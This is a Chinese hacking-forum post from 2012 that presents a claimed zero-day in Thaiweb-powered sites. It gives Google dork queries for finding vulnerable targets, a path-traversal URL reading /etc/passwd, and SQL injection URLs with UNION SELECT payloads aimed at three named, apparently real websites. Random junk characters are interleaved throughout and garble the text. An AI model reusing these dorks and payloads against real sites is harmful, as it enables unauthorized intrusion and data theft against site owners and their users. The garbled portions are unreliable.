找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2071|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
* w" t  l% {6 X( ]0 u
: W$ I) \5 V% @( Z, R; Bintext:powered by Thaiweb
6 }' c0 q; h. u0 i$ B1 \: h- b1 k
inurl:index.php?page=board.php1 Q- ]; N# D7 j( q
4 k9 Q3 u0 i) R" ]

# J6 n9 r2 M# q* K) J1 a
1 W, |- @/ P" x8 x利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
) r1 ~) z: I4 t
, e$ y) i, i9 l$ e
1 K) r+ o, s6 A% m1 n  }3 n; X  t# X. ^/ Z
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'7 O9 \1 ?9 |% X6 `6 _; ^8 P

8 e$ P7 F+ d  c9 a' i6 f( b  B 0 o* _4 W, _: j8 _2 x. z
& G' @2 ?) ]: p( L9 H( ?& l
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--. A, W* B0 d# u1 ]2 X
% x3 P$ _' M7 f! t
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--' ]: |8 M1 n6 o& t  p
8 Q+ n& j- ^/ ?% t0 t
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--) p, Q4 W, h9 a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表